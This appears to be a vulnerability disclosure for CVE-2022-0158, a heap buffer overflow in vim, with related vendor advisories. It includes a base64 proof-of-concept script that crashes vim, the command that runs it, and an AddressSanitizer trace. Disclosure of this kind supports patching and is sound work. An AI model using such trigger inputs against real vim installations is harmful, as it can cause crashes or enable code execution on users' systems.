Headline
CVE-2022-0158: Heap-based Buffer Overflow in vim
vim is vulnerable to Heap-based Buffer Overflow
Description
A Heap-based Buffer Overflow has been found in vim commit 2f0936c
Proof of Concept
base64 poc
ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
ZGVmY29tcGlsZQo=
~/fuzzing/vim/fuzz/bin/vim -u NONE -X -Z -e -s -S ./poc -c :qa!
ASan stack trace:
~/fuzzing/vim/fuzz/bin/vim -u NONE -X -Z -e -s -S ./poc -c :qa!
=================================================================
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
#0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
#1 0xc444a6 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
#2 0xf7515a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
#3 0xe1ba91 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
#4 0xe14ca4 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
#5 0xe14009 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
#6 0xe12ddf (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
#7 0xe12043 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
#8 0xe0e863 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
#9 0xe0ffaa (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
#10 0xdaf709 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
#11 0xdc68ed (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
#12 0xd92167 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
#13 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#14 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#15 0xb6680a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
#16 0xb6457f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
#17 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#18 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#19 0xf60f43 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
#20 0xf5d76f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
#21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#22 0x41dacd (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)
0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
allocated by thread T0 here:
#0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
#1 0x4c5d15 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==836524==ABORTINGRelated news
Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.
A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.5, macOS Big Sur 11.6.8, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Apple Security Advisory 2022-07-20-3 - macOS Big Sur 11.6.8 addresses code execution, information leakage, null pointer, out of bounds read, and out of bounds write vulnerabilities.
A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.